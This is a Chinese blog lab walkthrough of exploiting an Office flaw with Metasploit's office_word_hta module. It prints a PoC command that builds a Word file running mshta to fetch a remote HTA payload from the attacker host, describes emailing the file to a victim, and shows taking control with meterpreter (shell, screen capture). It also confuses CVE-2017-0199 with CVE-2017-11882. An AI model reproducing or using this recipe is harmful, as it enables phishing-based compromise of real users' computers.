利用office远程代码执行漏洞进行恶意邮件传播攻击

最新推荐文章于 2024-04-26 15:02:03 发布
最新推荐文章于 2024-04-26 15:02:03 发布
阅读量462 收藏 3
点赞数
分类专栏: 网络攻防实战 文章标签: CVE-2017-0199 office远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/robacco/article/details/87177997
版权

一、CVE-2017-0199漏洞概述

目前,利用该漏洞可以通杀office 2003至office 2016所有版本,影响office版本有:

  • office 2003 
  • office 2007 
  • office 2010 
  • office 2013 
  • office 2016
  1. 该漏洞产生原因是:由于Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
  2. 用途:利用这个漏洞,可以构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被攻击者直接控制。

二、实验过程

  1. 实验环境  (所有安装环境分享在我的网盘中链接:https://pan.baidu.com/s/1bUWiAyAMSaUfzIhdEgYEOw     提取码:a45i )
  2. 渗透机:Kali Linux + PoC测试代码(可在网盘中找到)
  3. 靶机:win7 + office 2016

一些概念:

  1. CVE:漏洞信息库
  2. PoC:漏洞测试代码。(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。使用编写好的 PoC 去验证测试目标是否存在着漏洞。常用python编写。
  3. HTA是HTML应用程序(HTML Application)的缩写,使用PoC代码将URL插入到hta文件并生成doc文件。

实验过程:

  1. 进入metasploit框架

   2.搜索需要的攻击模块并使用

    3.选择使用模块exploit/windows/fileformat/office_word_hta

     渗透模块可以在目录/usr/share/metasploit-framework/modules/exploits/中找到

4. 设置SRVHOST为攻击主机的IP,接着使用exploit命令进行渗透,开始监听。

5. 使用PoC生成带命令的doc文件

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.57.128:8080/default.hta" -o test.doc

6.将生成的test.doc压缩后通过邮件发送给win 7系统的用户,被害者接收了邮件并打开。

7.在win7 系统用户打开该Word文件后,可在渗透机观察到已经监听到了一个session。

查看session, 进入会话。

8. 进入会话后,用metepreter对会话进行管理,可使用help命令查看metepreter的常用命令。

例如,可用shell命令进入到靶机的系统。

9.若出现乱码,可以输入命令chcp 65001解决

10.进入到靶机系统中后,我们可对靶机的文件进行增删改查等操作,此时靶机已被控制。

还可以查看靶机的系统信息等

还可以截取靶机的屏幕进行查看

此时可以观察到靶机用户正在浏览的屏幕信息。

R0be1l
关注
专栏目录
[系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞CVE-2020-0796)及防御详解
杨秀璋的专栏
12-30 5149
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了MS08-067远程代码执行漏洞CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口。这篇文章将详细讲解SMBv3服务远程代码执行漏洞CVE-2020-0796),攻击者可能利用漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制,利用的端口
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
热门推荐
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
Microsoft Office2003(CVE-2012-0158)漏洞分析报告
02-28 641
软件名称:Microsoft Office 软件版本:2003 漏洞模块:MSCOMCTL.OCX POC来源:Kail(Linux)Metasploit框架 操作系统:Windows 7\sp1\x86 32位 漏洞编号:CVE文章目录0x01 漏洞原理0x02 漏洞成因0x03 利用过程proc溢出点加载模块漏洞动态利用ida动态分析0x04 结果0x05 漏洞原理 0x01 漏洞原理 关于...
Coremail远程代码执行
课嗨教育的专栏
04-17 2000
Coremail的nginx配置文件中针对/lunkr/cache路径做upstream的时候未做X-Forwarded-For字段的设置,从而可以利用该接口实现配合利用nginx不解析;但是tomcat解析;的差异特性实现绕过tomcat的manager应用127.0.0.1本地ip限制。并且coremail默认的tomcat-user为coremail,coremail lunkr/cache/;/;/../../manager/html 访问过去会直接跳转到tomcat控制台,这里你就可以.
02-扫盲篇-操作系统常见安全漏洞攻击方式操作系统用户权限分析
易编橙 · 终身成长社群,相遇已是上上签!
06-09 3304
文章目录操作系统常见安全漏洞攻击:WINDOWS操作系统用户权限分析LINUX操作系统用户权限分析Linux的单用户多任务Linux的多用户多任务用户(user)和用户组(group)用户组(group)介绍用户和用户组的对应关系用户及用户组配置文件介绍与用户相关的配置文件用户的配置文件/etc/passwdpasswd文件中有关UID的限制说明用户的影子口令文件/etc/shadow与用户组相关的配置文件用户组配置文件/etc/group用户组的影子文件/etc/gshadow拓展:Linux用户管理命令
[漏洞复现] CVE-2017-11882 通杀所有Office版本
weixin_30246221的博客
06-06 231
漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。 举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本:office 2003office 2007offi...
Office 2003 sp3(CVE-2012-0158)漏洞分析报告
w_g3366的博客
09-07 742
文章目录Office 2003 sp3(CVE-2012-0158)漏洞分析报告1.漏洞背景2.漏洞成因2.1 触发漏洞2.2 定位漏洞模块2.3 定位漏洞函数2.4 分析漏洞成因2.5 总结3.利用过程3.1 分析和设计利用漏洞的ShellCode的结构3.2 寻找跳板指令jmp esp3.3 编写ShellCode,注入ShellCode4.构造Exp5.结语 Office 2003 sp3(...
网络安全-典型的恶意代码
A soul tortured by desire
08-29 3023
网络安全-典型的恶意代码 计算机病毒 蠕虫病毒 特洛伊木马 流氓软件
漏洞利用各类型占比
m0_74079109的博客
12-01 1104
畸形攻击占所有攻击比例的 54.24%,畸形攻击作为网络攻击的一种,主要通过向目标系统发送有 缺陷的报文,使得目标系统在处理这样的报文时耗时很大甚至出错、崩溃,给目标机器构成威胁、带来 很大的损失。我们按照漏洞所在的主机环境或业务场景,将漏洞粗略的划分为服务器漏洞、桌面应用漏洞和设备 漏洞。由于设备类资源数量大,防御少,获取难度普遍较低,相关的漏洞利用难度也普遍较小,一旦利用 成功能够获取到设备系统较高的权限,因此这类漏洞受到攻击者的关注,需要安全厂商及相关从业人员 格外重视并探索防御的技术与方案。
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
最新发布
杨秀璋的专栏
04-26 431
前文介绍了利用MS Defender实现恶意样本家族批量标注。这篇文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
Windows漏洞利用开发系列教程第一部分:漏洞利用介绍
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
系统漏洞攻击
m0_52528594的博客
05-31 1442
1隐藏自己的行踪 攻击者入侵就是要神不知鬼不觉地侵入到目标计算机,因此,在入侵攻击之前要对自己做个伪装,不能让被攻击者轻易发现。在通过网络对目标计算机发起攻击之前,先对自己真实的IP地址隐藏。一般攻击者都是利用他人的电脑来隐藏自己真实的IP地址的。 2查询分析目标计算机攻击要有目标,在网络中的IP地址就能够真正标识一个在网的计算机,而域名是为了更好地对IP地址进行记忆管理的另一种显现方式,这样利用域名和IP地址就能确定目标计算机了。确定了目标计算机之后,就可以对其操作系统类型及所提供的服务等信息,做一个全方
Kali 渗透测试:利用HTA文件进行渗透攻击
Liu_Bruce的博客
05-13 2073
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序(HTML Application,HTA)文件就成了最好的选择。 HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通
信息安全技术(一)渗透攻击
m0_73736174的博客
05-27 1986
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架介绍:客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。
探索Office安全漏洞: SecWiki的`office-exploits`项目详解
gitblog_00069的博客
04-19 420
探索Office安全漏洞: SecWiki的office-exploits项目详解 项目地址:https://gitcode.com/SecWiki/office-exploits 项目简介 GitCode上的SecWiki/office-exploits是一个专注于研究Microsoft Office软件安全漏洞的开源项目。这个项目旨在教育和帮助安全研究人员、开发人员以及普通用户了解和防御Off...
网络安全:小心MSHTA漏洞为黑客开启远程控制之门
[智能天空教程区 Smart-sky]
01-29 986
这是一个可以让黑客欣喜若狂的新漏洞,一旦该漏洞被激活,就会有大量计算机成为黑客手中的肉鸡,被人远程控制不可避免……   微软的Windows操作系统进行了短暂的“喘息”后,近日又在攻击爱好者不懈努力下,被成功找出几个高危的系统安全漏洞,而Microsoft Windows MSHTA脚本执行漏洞就是其中的重要一员。  安全公告牌  MSHTA即HTA,此处的MS主要用于强调这是微软的
使用mshta.exe绕过应用程序白名单(多种方法)
weixin_30932215的博客
03-07 670
0x00 简介 很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual...
HTA(html应用程序)攻击
Zlirving_的博客
02-23 4115
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
mshta 反弹shell
dianyan5615的博客
12-12 422
  kali系统准备:   复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦): ## # This module requires Metasploit: https://metasploit.com/download # Curre...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值